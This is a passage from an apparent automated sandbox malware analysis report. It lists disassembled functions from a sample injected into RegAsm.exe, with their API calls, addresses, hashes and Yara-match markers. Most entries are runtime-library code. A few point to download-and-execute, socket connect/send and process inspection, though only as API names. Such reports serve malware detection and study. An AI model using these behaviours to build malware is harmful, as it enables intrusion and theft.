                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                        • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                                        • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                        • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                                        Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                                        • __alloca_probe_16.LIBCMT ref: 004511B1
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                                        • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                                        • __freea.LIBCMT ref: 0045121D
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                        • String ID:
                                                                        • API String ID: 313313983-0
                                                                        • Opcode ID: 176232f54f3ec98bfb029651777c0c6490447229ae5715771154ed3ce12be0f5
                                                                        • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                                        • Opcode Fuzzy Hash: 176232f54f3ec98bfb029651777c0c6490447229ae5715771154ed3ce12be0f5
                                                                        • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                                        Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                                        • _free.LIBCMT ref: 0044F3BF
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                        • String ID:
                                                                        • API String ID: 336800556-0
                                                                        • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                        • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                                        • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                        • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                                        Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                          • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                        • _free.LIBCMT ref: 100071B8
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                        • String ID:
                                                                        • API String ID: 336800556-0
                                                                        • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                        • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                        • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                        • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                        Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                                        • _free.LIBCMT ref: 004482D3
                                                                        • _free.LIBCMT ref: 004482FA
                                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free
                                                                        • String ID:
                                                                        • API String ID: 3170660625-0
                                                                        • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                        • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                                        • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                        • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                                        Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                        • _free.LIBCMT ref: 10005BB4
                                                                        • _free.LIBCMT ref: 10005BDB
                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free
                                                                        • String ID:
                                                                        • API String ID: 3170660625-0
                                                                        • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                        • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                        • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                        • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                        Function 0041C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                        • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C233
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CloseHandleOpen$FileImageName
                                                                        • String ID:
                                                                        • API String ID: 2951400881-0
                                                                        • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                                        • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                                        • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                                        • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                                        Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                        • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                        • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                        • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                        • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat
                                                                        • String ID:
                                                                        • API String ID: 493641738-0
                                                                        • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                        • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                        • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                        • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                        Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 004509D4
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 004509E6
                                                                        • _free.LIBCMT ref: 004509F8
                                                                        • _free.LIBCMT ref: 00450A0A
                                                                        • _free.LIBCMT ref: 00450A1C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                        • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                        • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                                        Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 100091D0
                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                        • _free.LIBCMT ref: 100091E2
                                                                        • _free.LIBCMT ref: 100091F4
                                                                        • _free.LIBCMT ref: 10009206
                                                                        • _free.LIBCMT ref: 10009218
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                        • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                        • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                        • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                        Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00444066
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 00444078
                                                                        • _free.LIBCMT ref: 0044408B
                                                                        • _free.LIBCMT ref: 0044409C
                                                                        • _free.LIBCMT ref: 004440AD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                        • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                        • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                                        Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 1000536F
                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                        • _free.LIBCMT ref: 10005381
                                                                        • _free.LIBCMT ref: 10005394
                                                                        • _free.LIBCMT ref: 100053A5
                                                                        • _free.LIBCMT ref: 100053B6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                        • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                        • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                        • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                        Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DownloadExecuteFileShell
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                        • API String ID: 2825088817-3056885514
                                                                        • Opcode ID: e6f86af5c8f28e584e9aa2e4da9c084a58e6eb2186a389311ba90f2acb595750
                                                                        • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                                        • Opcode Fuzzy Hash: e6f86af5c8f28e584e9aa2e4da9c084a58e6eb2186a389311ba90f2acb595750
                                                                        • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                                        Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _strpbrk.LIBCMT ref: 0044E738
                                                                        • _free.LIBCMT ref: 0044E855
                                                                          • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                                                                          • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                                                          • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                        • String ID: *?$.
                                                                        • API String ID: 2812119850-3972193922
                                                                        • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                        • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                                        • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                        • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                                        Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                                          • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00B64958,00000010), ref: 004048E0
                                                                          • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                        • String ID: @5U$XQG$NG
                                                                        • API String ID: 1634807452-2565508393
                                                                        • Opcode ID: 09e76647a820b8d9be795240911ad1c876635ea70d44e9ca6a71f2daa3085c5c
                                                                        • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                                        • Opcode Fuzzy Hash: 09e76647a820b8d9be795240911ad1c876635ea70d44e9ca6a71f2daa3085c5c
                                                                        • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                                        Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: `#D$`#D
                                                                        • API String ID: 885266447-2450397995
                                                                        • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                        • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                                        • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                        • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                                        Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                                                        • _free.LIBCMT ref: 00443540
                                                                        • _free.LIBCMT ref: 0044354A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$FileModuleName
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        • API String ID: 2506810119-1068371695
                                                                        • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                        • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                                        • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                        • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                                        Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                        • _free.LIBCMT ref: 10004CE8
                                                                        • _free.LIBCMT ref: 10004CF2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
